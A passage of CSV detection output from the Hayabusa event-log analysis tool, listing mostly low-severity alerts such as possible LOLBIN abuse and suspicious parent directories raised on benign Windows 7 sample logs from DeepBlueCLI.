0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 15:26:10.074 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xaa0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 18:52:07.690 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x704 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 18:52:09.246 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xcb0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 18:55:06.578 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 18:55:06.593 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xcc8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 18:55:10.198 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xebc | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 18:55:10.265 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x458 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 19:01:46.591 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb08 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 19:10:56.799 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 20:06:31.605 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 20:07:27.112 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x41c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 20:07:27.171 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x748 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 20:07:27.480 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 21:05:16.611 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 21:32:15.294 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1110 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 21:32:37.708 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x130c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 21:33:45.868 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x770 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 21:33:47.755 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x10e8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 21:33:47.770 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 21:36:08.808 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1454 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 21:36:32.722 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xbdc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 22:00:49.618 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 22:37:32.372 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-29 23:07:33.631 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 00:08:51.641 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 01:05:53.649 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 01:44:32.448 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x17ac | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 01:44:32.463 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x584 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 09:48:20.612 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 09:48:21.054 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 09:48:21.079 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x14fc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 09:48:21.166 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 09:48:21.686 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x10d4 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 09:48:21.710 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x15c0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 09:48:40.739 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x87c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 09:53:51.556 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0xb68 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 10:02:58.192 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 11:00:00.584 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x12b0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 11:12:43.202 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 12:03:25.212 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 12:12:52.789 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x103c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 12:12:52.817 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x15b8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 12:12:52.880 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x730 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 12:14:52.630 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x1790 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 12:14:52.630 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 13:00:10.222 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 13:21:18.584 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x17c4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 13:21:41.261 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x304 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 13:22:15.298 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x3a0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 13:22:37.732 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1194 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 14:01:57.235 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 14:36:31.003 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0x1130 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 15:13:52.245 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 15:21:31.129 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\msiexec.exe"" /i ""C:\Users\IEUser\Downloads\EMET Setup.msi"" | Path: C:\Windows\System32\msiexec.exe | PID: 0xaf0 | User: IEUser | LID: 0x4d011",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 15:21:31.333 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x11dc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 16:10:10.254 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 17:11:11.262 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 17:31:55.224 +00:00,IE10Win7,4688,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 17:31:58.790 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x15c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 17:31:58.886 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xcac | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 17:31:59.014 +00:00,IE10Win7,4688,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 17:32:06.234 +00:00,IE10Win7,4688,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 17:32:06.344 +00:00,IE10Win7,4688,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 17:32:06.392 +00:00,IE10Win7,7045,info,Persis,Service Installed,"Name: Mozilla Maintenance Service | Path: ""C:\Program Files\Mozilla Maintenance Service\maintenanceservice.exe"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-30 17:32:07.392 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x13ac | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 17:48:21.955 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 18:11:02.272 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 18:26:31.346 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0x1560 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 18:39:02.875 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 18:39:02.875 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 18:53:34.038 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\Win7-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x11d4 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 18:53:34.114 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\Win7-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x1284 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 18:54:17.892 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\Win7-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xe18 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 18:54:17.934 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\Win7-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x880 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 18:55:17.369 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x1670 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 18:55:17.405 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible 